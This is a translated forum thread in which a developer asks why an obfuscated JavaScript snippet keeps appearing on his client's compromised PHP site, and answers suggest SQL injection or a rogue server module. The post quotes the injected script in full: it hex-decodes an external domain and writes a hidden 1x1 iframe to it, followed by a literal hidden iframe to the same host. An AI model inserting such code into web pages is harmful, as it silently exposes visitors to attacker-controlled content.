客户的网站遭到攻击,eeek!

Question

好吧,我想这一天不得不来.

我的客户的网站已被Google妥协并列入黑名单.当你加载主页面时,这个javascript会自动添加到文档的底部:

<script type="text/javascript">var str='google-analytics.com';var str2='6b756c6b61726e696f6f37312e636f6d';str4='php';var str3='if';str='';for(var i=0;i<str2.length;i=i+2){str=str+'%'+str2.substr(i,2);}str=unescape(str);document.write('<'+str3+'rame width=1 height=1 src="http://'+str+'/index.'+str4+'?id=382" style="visibility: hidden;"></'+str3+'rame>');</script></head><body><iframe src="http://kulkarnioo71.com/index.php?id=382" style="visibility: hidden;" width="1" height="1"></iframe>

我还没有解剖它,但很明显,这是一个试图冒充谷歌分析的攻击者.我无法理解的是,如果我从主页面中删除每个单独的HTML,那么index.html是一个空文档,javascript STILL将被嵌入.是什么赋予了？怎么可能？

更新

• 该网站是一个非常简单的日历应用程序,运行在10美元/月的godaddy unix帐户,MySQL,PHP.

• 它不是我的计算机特有的本地东西,因为我的客户端是那个用问题打电话给我的人.我家里的所有电脑也发生过(4)

我将在网络服务器上进行扫描......

来源确定

好吧,我发现了javascript的来源.我愚蠢地只清空了template.html文件,但仍然通过我的php模板系统运行脚本.显然,有些上面的代码被附加到我index.php和main.php文件的底部.这怎么可能？

更多背景:

• 它是一个日历应用程序,如上所述,它仅由我的客户的小公司使用.登录需要做任何事情,只有5个人拥有帐户.我可以保证他们都不会尝试任何恶作剧.我显然无法保证有人掌握了他们的信息并且确实尝试了恶作剧.
• 可悲的是,我差不多4年前创建了这个网站,所以我并不完全有信心我保护孩子们现在正在尝试的一切,但我仍然无法理解攻击者如何可能获得访问网络服务器以附加此javascript到我的PHP文件.

Answer 1

您是否在提供SQL数据库中的任何内容？这种妥协可能是SQL注入攻击,并且数据库中的站点内容已被此脚本/标记替换/修改.

Answer 2

流氓HTTP模块(在IIS中)或apache的等价物可以为任何HTTP请求预先添加,附加或甚至修改内容,即使对于静态文件也是如此.这表明服务器本身已被泄露.

编辑:如果您告诉我们您正在使用的Web服务器类型,我们将能够提供更具体的故障排除建议.